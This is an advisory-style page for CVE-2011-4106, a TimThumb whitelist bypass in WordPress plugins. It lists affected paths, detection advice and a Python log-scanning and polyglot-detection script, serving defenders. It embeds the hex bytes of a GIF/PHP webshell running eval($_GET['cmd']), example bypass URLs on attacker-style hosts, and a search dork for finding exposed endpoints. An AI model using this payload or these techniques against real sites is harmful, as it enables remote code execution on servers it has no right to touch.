CVE-2011-4106
published 2013-10-26


Priority: P2 · 75 · medium · 6.8 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Tags: ITW · EXPLOIT · VulnCheck KEV · Exploited in the wild
EPSS: 23.16% (97.5th percentile)
TimThumb (timthumb.php) before 2.0 does not validate the entire source with the domain white list, which allows remote attackers to upload and execute arbitrary code via a URL containing a white-listed domain in the src parameter, then accessing it via a direct request to the file in the cache directory, as exploited in the wild in August 2011.

Affected (1 range)

Vendor     | Product  | Version range | Fixed in
binarymoon | timthumb | <= 1.99       |

Detection & IOCs (extracted from sources)

filename: timthumb.php
path: /wp-content/plugins/category-grid-view-gallery/includes/timthumb.php
path: /wp-content/plugins/category-grid-view-gallery/cache/
path: /wp-content/plugins/auto-attachments/thumb.php
path: /wp-content/plugins/auto-attachments/cache/
path: /wp-content/plugins/wp-marketplace/libs/timthumb.php
path: /wp-content/plugins/wp-marketplace/libs/cache/
path: /wp-content/plugins/dp-thumbnail/timthumb/timthumb.php
path: /wp-content/plugins/dp-thumbnail/timthumb/cache/
path: /wp-content/plugins/vk-gallery/lib/timthumb.php
path: /wp-content/plugins/vk-gallery/lib/cache/
path: /wp-content/plugins/rekt-slideshow/picsize.php
path: /wp-content/plugins/rekt-slideshow/cache/
path: /wp-content/plugins/cac-featured-content/timthumb.php
path: /wp-content/plugins/cac-featured-content/temp/
path: /wp-content/plugins/rent-a-car/libs/timthumb.php
path: /wp-content/plugins/rent-a-car/libs/cache/
path: /wp-content/plugins/lisl-last-image-slider/timthumb.php
path: /wp-content/plugins/lisl-last-image-slider/cache/
path: /wp-content/plugins/islidex/js/timthumb.php
path: /wp-content/plugins/islidex/js/cache/
path: /wp-content/plugins/kino-gallery/timthumb.php
path: /wp-content/plugins/kino-gallery/cache/
path: /wp-content/plugins/cms-pack/timthumb.php
path: /wp-content/uploads/cms-pack-cache/
path: /wp-content/plugins/a-gallery/timthumb.php
path: /wp-content/plugins/a-gallery/cache/
path: /wp-content/plugins/category-list-portfolio-page/scripts/timthumb.php
path: /wp-content/plugins/category-list-portfolio-page/scripts/cache/
path: /wp-content/plugins/really-easy-slider/inc/thumb.php
path: /wp-content/plugins/really-easy-slider/inc/cache/
path: /wp-content/plugins/verve-meta-boxes/tools/timthumb.php
path: /wp-content/plugins/verve-meta-boxes/tools/cache/
path: /wp-content/plugins/user-avatar/user-avatar-pic.php
path: /wp-content/uploads/avatars/
path: /wp-content/plugins/extend-wordpress/helpers/timthumb/image.php
path: /wp-content/plugins/extend-wordpress/helpers/timthumb/cache/
path: /wp-content/themes/THEME/timthumb.php
path: /wp-content/themes/THEME/cache/
bytes: \x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00
  • Monitor HTTP requests to timthumb.php (and aliases such as thumb.php, picsize.php, image.php) where the `src` GET parameter contains a subdomain-crafted URL embedding a whitelisted domain (e.g., blogger.com.evil.com) to bypass the domain whitelist check.
  • Alert on newly created .php files inside WordPress cache directories (e.g., wp-content/*/cache/*.php, wp-content/uploads/*/cache/*.php) — these are the webshells dropped by the exploit.
  • Detect the malicious polyglot payload: a GIF89a header (bytes 47 49 46 38 39 61) and a minimal 1x1 GIF body, followed by PHP eval($_GET['cmd']) code (bytes 3C 3F 70 68 70 20 40 65 76 61 6C 28 24 5F 47 45 54 5B 27 63 6D 64 27 5D 29 3B 20 3F 3E) in files fetched remotely by timthumb. The GIF header satisfies timthumb's image check; the PHP runs once the cached copy is requested directly.
  • For the User Avatar plugin variant, watch for requests supplying an attacker-controlled `allowedSites[]` parameter alongside a crafted `src` URL, which requires register_globals to be enabled.
  • For the Rekt Slideshow plugin, the src parameter value is Base64-encoded before being passed to picsize.php — decode Base64 values in the src parameter when inspecting requests to this endpoint.
  • Use the Google dork `inurl:timthumb ext:php -site:googlecode.com -site:google.com` to identify exposed timthumb.php endpoints on internet-facing WordPress installations.
  • Only TimThumb versions 1.x through 1.32 cache the remote file as a .php file; version 1.33 changed the cache filename extension and does not save as .php, limiting direct code execution via the cache path.
  • The User Avatar plugin exploit variant additionally requires PHP register_globals to be enabled on the server and at least one user account to have an avatar directory.
  • Cache directory paths vary per plugin and host configuration; the shell drop location must be confirmed per deployment (e.g., external_md5(src).php vs md5(src).php naming differs between plugin versions).
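The detection points above as working code. This is an added example for this page, not TimThumb's own source and not a rule from any vendor named here: a model of the pre-2.0 substring whitelist check beside a hostname-boundary check, a scan over constructed access-log lines (including the Base64-encoded `src` that the Rekt Slideshow `picsize.php` alias takes) for requests the flawed check would accept and the correct one would reject, and a test for the GIF/PHP polyglot built from the IOC bytes. The whitelist subset, the endpoint pattern, the log lines and all helper names are assumptions of the example.

```python
"""Detection logic for CVE-2011-4106 (TimThumb < 2.0 remote-file cache RCE).

Added example for this page: not TimThumb's source, not a vendor rule. The
whitelist, endpoint pattern and log lines are constructed; IOC_PAYLOAD copies
the byte IOC quoted above.
"""
import base64
import binascii
import re
from urllib.parse import quote, unquote, urlsplit

# Hosts TimThumb 1.x trusted (constructed subset; the real default list is longer).
ALLOWED_SITES = ["flickr.com", "picasa.com", "blogger.com", "wordpress.com", "img.youtube.com"]

# timthumb.php plus the aliases named in the IOC section above (assumed pattern).
TIMTHUMB_ENDPOINTS = re.compile(r"/(timthumb|thumb|picsize|image|user-avatar-pic)\.php$", re.I)

# IOC payload from this page: a 1x1 GIF89a followed by <?php @eval($_GET['cmd']); ?>
IOC_PAYLOAD = (
    b"\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xFF\xFF\xFF\x00\x00\x00"
    b"\x21\xF9\x04\x01\x00\x00\x00\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02"
    b"\x02\x44\x01\x00\x3B\x00"
    b"\x3C\x3F\x70\x68\x70\x20\x40\x65\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27"
    b"\x63\x6D\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00"
)


def vulnerable_whitelist_check(src, allowed=ALLOWED_SITES):
    """Models the pre-2.0 logic: a whitelisted domain anywhere in the URL passes."""
    src = src.lower()
    return any(domain in src for domain in allowed)


def hardened_whitelist_check(src, allowed=ALLOWED_SITES):
    """Compare only the parsed hostname, and only at a label boundary."""
    host = (urlsplit(src).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in allowed)


def is_whitelist_bypass(src):
    """True when the substring check accepts src but the hostname check rejects it."""
    return vulnerable_whitelist_check(src) and not hardened_whitelist_check(src)


def _query_param(query, name):
    # unquote() leaves '+' alone, unlike parse_qs(), so Base64 values survive intact.
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote(value)
    return None


def extract_src(request_path):
    """Return (endpoint, decoded src) for a TimThumb-style request, else None."""
    parts = urlsplit(request_path)
    if not TIMTHUMB_ENDPOINTS.search(parts.path):
        return None
    src = _query_param(parts.query, "src")
    if src is None:
        return None
    if parts.path.lower().endswith("picsize.php"):
        # Rekt Slideshow passes src Base64-encoded; keep the raw value if it is not.
        try:
            src = base64.b64decode(src, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            pass
    return parts.path, src


# Combined log format: ip ident user [time] "METHOD path proto" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+) [^"]*" \d{3}')


def scan_access_log(lines):
    """Return (client ip, endpoint, decoded src) for requests matching the bypass pattern."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        found = extract_src(match.group("path"))
        if found and is_whitelist_bypass(found[1]):
            hits.append((match.group("ip"), found[0], found[1]))
    return hits


def is_polyglot_shell(data):
    """Flag a file that starts as a GIF but carries a PHP open tag after the header."""
    return data[:6] in (b"GIF89a", b"GIF87a") and b"<?php" in data[6:]


# Constructed access-log lines (RFC 5737 addresses); none come from a real incident.
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Aug/2011:10:15:01 +0000] "GET /wp-content/themes/THEME/timthumb.php'
    '?src=http://blogger.com.evil.example/x.php HTTP/1.1" 200 1234',
    '198.51.100.7 - - [02/Aug/2011:10:16:44 +0000] "GET /wp-content/themes/THEME/timthumb.php'
    '?src=http://img.youtube.com/vi/abc/0.jpg&w=100 HTTP/1.1" 200 5432',
    '203.0.113.5 - - [02/Aug/2011:10:17:09 +0000] "GET /wp-content/plugins/rekt-slideshow/picsize.php'
    '?src=' + quote(base64.b64encode(b"http://flickr.com.evil.example/s.php").decode()) + ' HTTP/1.1" 200 99',
    '198.51.100.9 - - [02/Aug/2011:10:18:00 +0000] "GET /index.php HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for ip, endpoint, src in scan_access_log(SAMPLE_LOG):
        print(f"bypass attempt from {ip} via {endpoint}: src={src}")
    print("IOC payload is a GIF/PHP polyglot:", is_polyglot_shell(IOC_PAYLOAD))
```

Run against the constructed lines, the scan reports the two requests whose `src` host merely contains a whitelisted name (`blogger.com.evil.example`, and `flickr.com.evil.example` hidden behind Base64) and ignores the genuine `img.youtube.com` fetch; `is_polyglot_shell` accepts the IOC bytes and rejects a plain GIF. In production, pair the log scan with a file-system watch on the cache directories listed above, since the request only succeeds once the cached `.php` copy is fetched directly.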

CVSS provenance

Source    | Version | Score      | Vector
nvd       | v2.0    | 6.8 MEDIUM | AV:N/AC:M/Au:N/C:P/I:P/A:P
vulncheck |         | 6.8 MEDIUM |